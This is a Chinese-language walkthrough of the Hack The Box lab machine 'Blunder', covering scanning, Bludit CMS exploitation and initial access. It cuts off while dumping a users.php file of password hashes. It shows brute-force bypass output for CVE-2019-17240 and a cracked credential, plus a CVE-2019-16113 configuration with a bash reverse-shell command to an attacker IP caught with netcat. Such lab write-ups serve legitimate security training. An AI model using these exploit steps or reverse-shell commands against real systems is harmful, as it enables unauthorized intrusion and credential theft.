Blunder-htb-writeup

0x00 靶场技能介绍

章节技能:目录扫描、CVE-2019-17240漏洞利用、cewl工具密码生成、CVE-2019-16113漏洞利用、配置文件密码泄露、md5密码破解、sudo 1.8.27漏洞提权

参考链接:https://www.jgeek.cn/article/71

参考链接:https://princerohit8800.medium.com/blunder-e39b2cfda153

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.191

2、端口扫描下,获取下开放端口信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-et8bwvyzp7]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -p- 10.10.10.191 --min-rate=5000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-22 12:33 GMT
Nmap scan report for 10.10.10.191
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.55 seconds

3、使用 nikto 工具扫描下80端口的网站服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ nikto -h http://10.10.10.191
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.191
+ Target Hostname:    10.10.10.191
+ Target Port:        80
+ Start Time:         2023-12-22 13:47:21 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-2922: /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3092: /install.php: install.php file found.
+ /admin/account.asp: Admin login page/section found.
+ /admin/account.html: Admin login page/section found.
+ /admin/account.php: Admin login page/section found.
+ /admin/controlpanel.asp: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/controlpanel.php: Admin login page/section found.
+ /admin/cp.asp: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/cp.php: Admin login page/section found.
+ /admin/home.asp: Admin login page/section found.
+ /admin/home.php: Admin login page/section found.
+ /admin/index.asp: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.asp: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /admin/login.php: Admin login page/section found.
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 26494 requests: 0 error(s) and 54 item(s) reported on remote host
+ End Time:           2023-12-22 13:52:23 (GMT0) (302 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

4、使用 gobuster 进行目录扫描下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.191
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/22 14:12:03 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/0                    (Status: 200) [Size: 7562]
/about                (Status: 200) [Size: 3281]
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/cgi-bin/             (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
/LICENSE              (Status: 200) [Size: 1083]                               
/robots.txt           (Status: 200) [Size: 22]                                 
/server-status        (Status: 403) [Size: 277]                                
                                                                               
===============================================================
2023/12/22 14:12:16 Finished
===============================================================

5、使用 dirsearch 进行目录扫描下,作为辅助扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ git clone https://github.com/maurosoria/dirsearch
Cloning into 'dirsearch'...
remote: Enumerating objects: 11745, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (106/106), done.
remote: Total 11745 (delta 86), reused 119 (delta 59), pack-reused 11580
Receiving objects: 100% (11745/11745), 21.57 MiB | 27.57 MiB/s, done.
Resolving deltas: 100% (7703/7703), done.
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ cd dirsearch/
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ pip3 install -r requirements.txt 
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ dir
dir             dirbuster       dirmngr-client  dirsplit
dirb            dircolors       dirname         
dirb-gendict    dirmngr         dirs            
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ python3 ./dirsearch.py -u http://10.10.10.191

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11715

Output: /home/shiyan/Desktop/dirsearch/reports/http_10.10.10.191/_23-12-22_14-19-30.txt

Target: http://10.10.10.191/

[14:19:30] Starting: 
[14:19:36] 200 -  955B  - /.github/
[14:19:36] 200 -  563B  - /.gitignore
[14:19:36] 404 -  274B  - /.gitignore/
[14:19:37] 403 -  277B  - /.ht_wsr.txt
[14:19:37] 403 -  277B  - /.htaccess.bak1
[14:19:37] 403 -  277B  - /.htaccess.orig
[14:19:37] 403 -  277B  - /.htaccess.sample
[14:19:37] 403 -  277B  - /.htaccess.save
[14:19:37] 403 -  277B  - /.htaccess_orig
[14:19:37] 403 -  277B  - /.htaccess_sc
[14:19:38] 403 -  277B  - /.htaccessOLD2
[14:19:38] 403 -  277B  - /.htm
[14:19:37] 403 -  277B  - /.htaccess_extra
[14:19:38] 403 -  277B  - /.htaccessBAK
[14:19:38] 403 -  277B  - /.htaccessOLD
[14:19:38] 403 -  277B  - /.httr-oauth
[14:19:38] 403 -  277B  - /.htpasswds
[14:19:38] 403 -  277B  - /.htpasswd_test
[14:19:38] 403 -  277B  - /.html
[14:19:44] 403 -  277B  - /.php
[14:19:44] 403 -  277B  - /.php3
[14:19:56] 200 -    3KB - /about
[14:20:01] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[14:20:02] 200 -    2KB - /admin/.config
[14:20:02] 200 -    2KB - /admin/_logs/error-log
[14:20:02] 200 -    2KB - /admin/.htaccess
[14:20:02] 200 -    2KB - /admin/_logs/access.log
[14:20:02] 200 -    2KB - /admin/access.log
[14:20:03] 200 -    2KB - /admin/_logs/login.txt
[14:20:03] 200 -    2KB - /admin/_logs/error_log
[14:20:03] 200 -    2KB - /admin/
[14:20:03] 200 -    2KB - /admin/account.aspx
[14:20:03] 200 -    2KB - /admin/_logs/access-log
[14:20:03] 200 -    2KB - /admin/account
[14:20:03] 200 -    2KB - /admin/account.jsp
[14:20:02] 200 -    2KB - /admin/_logs/error.log
[14:20:02] 200 -    2KB - /admin/access.txt
[14:20:03] 200 -    2KB - /admin/admin-login
[14:20:03] 200 -    2KB - /admin/access_log
[14:20:03] 200 -    2KB - /admin/account.js
[14:20:02] 200 -    2KB - /admin/%3bindex/
[14:20:03] 200 -    2KB - /admin/admin-login.js
[14:20:03] 200 -    2KB - /admin/admin-login.html
[14:20:03] 200 -    2KB - /admin/admin
[14:20:03] 200 -    2KB - /admin/admin.aspx
[14:20:03] 200 -    2KB - /admin/admin.php
[14:20:03] 200 -    2KB - /admin/account.html
[14:20:03] 200 -    2KB - /admin/admin-login.aspx
[14:20:04] 200 -    2KB - /admin/admin_login
[14:20:04] 200 -    2KB - /admin/admin_login.aspx
[14:20:03] 200 -    2KB - /admin/_logs/access_log
[14:20:04] 200 -    2KB - /admin/admin_login.html
[14:20:03] 200 -    2KB - /admin/account.php
[14:20:04] 200 -    2KB - /admin/adminLogin.jsp
[14:20:04] 200 -    2KB - /admin/admin_login.js
[14:20:02] 200 -    2KB - /admin/_logs/err.log
[14:20:04] 200 -    2KB - /admin/adminLogin
[14:20:04] 200 -    2KB - /admin/adminLogin.aspx
[14:20:04] 200 -    2KB - /admin/admin_login.jsp
[14:20:03] 200 -    2KB - /admin/admin-login.php
[14:20:04] 200 -    2KB - /admin/backup/
[14:20:03] 200 -    2KB - /admin/admin-login.jsp
[14:20:04] 200 -    2KB - /admin/backups/
[14:20:04] 200 -    2KB - /admin/adminLogin.js
[14:20:04] 200 -    2KB - /admin/admin_login.php
[14:20:04] 200 -    2KB - /admin/adminLogin.php
[14:20:03] 200 -    2KB - /admin/admin.js
[14:20:04] 200 -    2KB - /admin/controlpanel
[14:20:04] 200 -    2KB - /admin/controlpanel.php
[14:20:04] 200 -    2KB - /admin/controlpanel.html
[14:20:04] 200 -    2KB - /admin/adminLogin.html
[14:20:04] 200 -    2KB - /admin/config.php
[14:20:05] 200 -    2KB - /admin/controlpanel.js
[14:20:03] 200 -    2KB - /admin/admin.html
[14:20:05] 200 -    2KB - /admin/cp.aspx
[14:20:03] 200 -    2KB - /admin/admin.jsp
[14:20:05] 200 -    2KB - /admin/cp.html
[14:20:05] 200 -    2KB - /admin/cp.jsp
[14:20:05] 200 -    2KB - /admin/db/
[14:20:05] 200 -    2KB - /admin/data/autosuggest
[14:20:04] 200 -    2KB - /admin/controlpanel.jsp
[14:20:05] 200 -    2KB - /admin/default
[14:20:04] 200 -    2KB - /admin/adminer.php
[14:20:05] 200 -    2KB - /admin/default.asp
[14:20:05] 200 -    2KB - /admin/cp.php
[14:20:05] 200 -    2KB - /admin/download.php
[14:20:05] 200 -    2KB - /admin/errors.log
[14:20:05] 200 -    2KB - /admin/error.txt
[14:20:05] 200 -    2KB - /admin/default/admin.asp
[14:20:05] 200 -    2KB - /admin/error.log
[14:20:05] 200 -    2KB - /admin/error_log
[14:20:04] 200 -    2KB - /admin/admin/login
[14:20:05] 200 -    2KB - /admin/cp.js
[14:20:05] 200 -    2KB - /admin/default/login.asp
[14:20:05] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[14:20:05] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[14:20:05] 200 -    2KB - /admin/export.php
[14:20:05] 200 -    2KB - /admin/FCKeditor
[14:20:05] 200 -    2KB - /admin/dumper/
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[14:20:05] 200 -    2KB - /admin/cp
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[14:20:04] 200 -    2KB - /admin/controlpanel.aspx
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[14:20:06] 200 -    2KB - /admin/file.php
[14:20:06] 200 -    2KB - /admin/files.php
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[14:20:05] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[14:20:05] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[14:20:06] 200 -    2KB - /admin/home.php
[14:20:06] 200 -    2KB - /admin/home.aspx
[14:20:06] 200 -    2KB - /admin/includes/configure.php~
[14:20:06] 200 -    2KB - /admin/home.js
[14:20:06] 200 -    2KB - /admin/heapdump
[14:20:06] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[14:20:06] 200 -    2KB - /admin/home.jsp
[14:20:07] 200 -    2KB - /admin/index.php
[14:20:07] 200 -    2KB - /admin/index.html
[14:20:06] 200 -    2KB - /admin/home
[14:20:07] 200 -    2KB - /admin/js/tiny_mce/
[14:20:06] 200 -    2KB - /admin/index
[14:20:07] 200 -    2KB - /admin/index.jsp
[14:20:06] 200 -    2KB - /admin/home.html
[14:20:07] 200 -    2KB - /admin/login
[14:20:07] 200 -    2KB - /admin/index.js
[14:20:07] 200 -    2KB - /admin/log/error.log
[14:20:07] 200 -    2KB - /admin/js/tiny_mce
[14:20:07] 200 -    2KB - /admin/login.asp
[14:20:07] 200 -    2KB - /admin/js/tinymce/
[14:20:07] 200 -    2KB - /admin/login.do
[14:20:07] 200 -    2KB - /admin/log
[14:20:07] 200 -    2KB - /admin/login.htm
[14:20:07] 200 -    2KB - /admin/login.aspx
[14:20:07] 200 -    2KB - /admin/login.py
[14:20:07] 200 -    2KB - /admin/login.rb
[14:20:07] 200 -    2KB - /admin/login.jsp
[14:20:07] 200 -    2KB - /admin/login.js
[14:20:07] 200 -    2KB - /admin/logon.php
[14:20:07] 200 -    2KB - /admin/logon.aspx
[14:20:08] 200 -    2KB - /admin/logon.jsp
[14:20:08] 200 -    2KB - /admin/logon.html
[14:20:07] 200 -    2KB - /admin/logon
[14:20:08] 200 -    2KB - /admin/logon.js
[14:20:08] 200 -    2KB - /admin/logs/
[14:20:08] 200 -    2KB - /admin/logs/access.log
[14:20:08] 200 -    2KB - /admin/logs/access_log
[14:20:07] 200 -    2KB - /admin/login.php
[14:20:07] 200 -    2KB - /admin/login.html
[14:20:08] 200 -    2KB - /admin/logs/err.log
[14:20:07] 200 -    2KB - /admin/index.aspx
[14:20:07] 200 -    2KB - /admin/js/tinymce
[14:20:08] 200 -    2KB - /admin/logs/access-log
[14:20:08] 200 -    2KB - /admin/logs/errors.log
[14:20:08] 200 -    2KB - /admin/logs/error_log
[14:20:08] 200 -    2KB - /admin/manage
[14:20:08] 200 -    2KB - /admin/manage.asp
[14:20:08] 200 -    2KB - /admin/logs/error-log
[14:20:08] 200 -    2KB - /admin/manage/admin.asp
[14:20:08] 200 -    2KB - /admin/mysql/
[14:20:08] 200 -    2KB - /admin/manage/login.asp
[14:20:08] 200 -    2KB - /admin/mysql2/index.php
[14:20:08] 200 -    2KB - /admin/logs/error.log
[14:20:08] 200 -    2KB - /admin/logs/login.txt
[14:20:09] 200 -    2KB - /admin/phpMyAdmin/
[14:20:09] 200 -    2KB - /admin/phpmyadmin/
[14:20:09] 200 -    2KB - /admin/phpmyadmin2/index.php
[14:20:09] 200 -    2KB - /admin/phpMyAdmin/index.php
[14:20:09] 200 -    2KB - /admin/phpmyadmin/index.php
[14:20:08] 200 -    2KB - /admin/mysql/index.php
[14:20:09] 200 -    2KB - /admin/phpMyAdmin
[14:20:09] 200 -    2KB - /admin/PMA/index.php
[14:20:09] 200 -    2KB - /admin/pMA/
[14:20:09] 200 -    2KB - /admin/pma/index.php
[14:20:09] 200 -    2KB - /admin/portalcollect.php?f=http://xxx&t=js
[14:20:09] 200 -    2KB - /admin/release
[14:20:09] 200 -    2KB - /admin/pma/
[14:20:09] 200 -    2KB - /admin/private/logs
[14:20:09] 200 -    2KB - /admin/scripts/fckeditor
[14:20:09] 200 -    2KB - /admin/sqladmin/
[14:20:09] 200 -    2KB - /admin/secure/logon.jsp
[14:20:10] 200 -    2KB - /admin/sysadmin/
[14:20:10] 200 -    2KB - /admin/tiny_mce
[14:20:10] 200 -    2KB - /admin/uploads.php
[14:20:09] 200 -    2KB - /admin/signin
[14:20:10] 200 -    2KB - /admin/user_count.txt
[14:20:10] 200 -    2KB - /admin/web/
[14:20:10] 200 -    2KB - /admin/views/ajax/autocomplete/user/a
[14:20:09] 200 -    2KB - /admin/sxd/
[14:20:10] 200 -    2KB - /admin/tinymce
[14:20:09] 200 -    2KB - /admin/pol_log.txt
[14:20:10] 200 -    2KB - /admin/upload.php
[14:21:04] 200 -   30B  - /install.php
[14:21:04] 200 -   30B  - /install.php?profile=default
[14:21:09] 200 -    1KB - /LICENSE
[14:21:34] 200 -    3KB - /README.md
[14:21:41] 200 -   22B  - /robots.txt
[14:21:43] 403 -  277B  - /server-status
[14:21:43] 403 -  277B  - /server-status/
[14:21:58] 200 -  118B  - /todo.txt

Task Completed

6、至此扫描工作差不多了,开始查看下获取到的信息

7、首页是一个cms的网站信息

8、后台管理页面显示这是一个 bludit 的管理后台

9、在这个管理后台的页面源码中,发现了当前的版本号信息

10、通过目录扫描发现的 todo.txt 文件,疑似发现了一个用户ID的信息

1
2
3
4
5
6
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.191/todo.txt                 
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

11、至此,我们获取到了2个信息,疑似用户名ID:fergus;当前网站CMS版本号及名称:Bludit CMS 3.9.2

12、使用 searchsploit 搜索相关漏洞信息

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Bludit 3.9.2     
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Bludit  3.9.2 - Authentication Bruteforce Mitigation B | php/webapps/48746.rb
Bludit 3.9.2 - Auth Bruteforce Bypass                  | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metas | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal                     | multiple/webapps/48701.txt
Bludit < 3.13.1 Backup Plugin - Arbitrary File Downloa | php/webapps/51541.py
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

13、这里发现了一个 Auth Bruteforce Bypass 漏洞,可以用来爆破用户密码

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/48942.py 
  Exploit: Bludit 3.9.2 - Auth Bruteforce Bypass
      URL: https://www.exploit-db.com/exploits/48942
     Path: /usr/share/exploitdb/exploits/php/webapps/48942.py
    Codes: CVE-2019-17240
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/48942.py

14、由于使用常规字典并不能成功爆破出账号密码,所以需要使用 cewl 工具,根据目标网站信息生成一套字典进行破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/桌面]
└─$ cewl 10.10.10.191 > wordlist.txt

┌──(kali㉿kali)-[~/桌面]
└─$ echo fergus > user.txt

┌──(kali㉿kali)-[~/桌面]
└─$ python3 48942.py -l http://10.10.10.191/admin/login.php -u user.txt -p wordlist.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX 
[.] Brute Force: Testing -> fergus:via
[▃] Brute Force: Testing -> fergus:him
[◓] Brute Force: Testing -> fergus:Distinguished
[◤] Brute Force: Testing -> fergus:Contribution
[┬] Brute Force: Testing -> fergus:Letters
[←] Brute Force: Testing -> fergus:probably
[▅] Brute Force: Testing -> fergus:best
[◤] Brute Force: Testing -> fergus:fictional
[o] Brute Force: Testing -> fergus:character
[█] Brute Force: Testing -> fergus:RolandDeschain

[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain

15、到这里成功爆破出了用户的密码: fergus:RolandDeschain

16、但是这些信息,并不足已让我们更加层次的获取一些权限,使用谷歌进行搜索RCE漏洞 Bludit 3.9.2 RCE

17、发现了一个 CVE-2019-16113 编号的漏洞,进行尝试使用

https://github.com/hg8/CVE-2019-16113-PoC

1
2
3
4
5
6
# 修改配置信息

url = "http://10.10.10.191"
user = "fergus"
password = "RolandDeschain"
cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'"

18、发现可以利用,成功获取到一个初始下的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ python3 CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 024f87d5d005111e913a8a8f9b84d4084e1b53f3
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command Execution Successful.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.191] 41598
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

19、通过初步的信息探测,我们可能需要 hugo 用户下的权限,才能查看到第一个用户flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ls -la /home/
ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Apr 27  2020 .
drwxr-xr-x 21 root  root  4096 Jul  6  2021 ..
drwxr-xr-x 16 hugo  hugo  4096 May 26  2020 hugo
drwxr-xr-x 16 shaun shaun 4096 Jul  6  2021 shaun
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ls -la /home/hugo
ls -la /home/hugo
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26  2020 .
drwxr-xr-x  4 root root 4096 Apr 27  2020 ..
lrwxrwxrwx  1 root root    9 Apr 28  2020 .bash_history -> /dev/null
-rw-r--r--  1 hugo hugo  220 Nov 28  2019 .bash_logout
-rw-r--r--  1 hugo hugo 3771 Nov 28  2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27  2020 .cache
drwx------ 11 hugo hugo 4096 Nov 28  2019 .config
drwx------  3 hugo hugo 4096 Apr 27  2020 .gnupg
drwxrwxr-x  3 hugo hugo 4096 Nov 28  2019 .local
drwx------  5 hugo hugo 4096 Apr 27  2020 .mozilla
-rw-r--r--  1 hugo hugo  807 Nov 28  2019 .profile
drwx------  2 hugo hugo 4096 Apr 27  2020 .ssh
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Desktop
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Documents
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Downloads
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Music
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Pictures
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Public
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Templates
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Videos
-r--------  1 hugo hugo   33 Dec 22 14:38 user.txt
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
<ludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt   
cat: /home/hugo/user.txt: Permission denied
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

20、通过在当前网站目录下不断信息枚举,收集到一些涉及admin或者一些密码的信息,但是并没有成果的破解成功,且这些密码并没有带来什么有价值的进展

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd ../
cd ../
www-data@blunder:/var/www/bludit-3.9.2/bl-content$ ls
ls
databases
pages
tmp
uploads
workspaces
www-data@blunder:/var/www/bludit-3.9.2/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ ls
ls
categories.php
pages.php
plugins
security.php
site.php
syslog.php
tags.php
users.php
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "7192381e28f6bd412abe3d92a0c9144b",
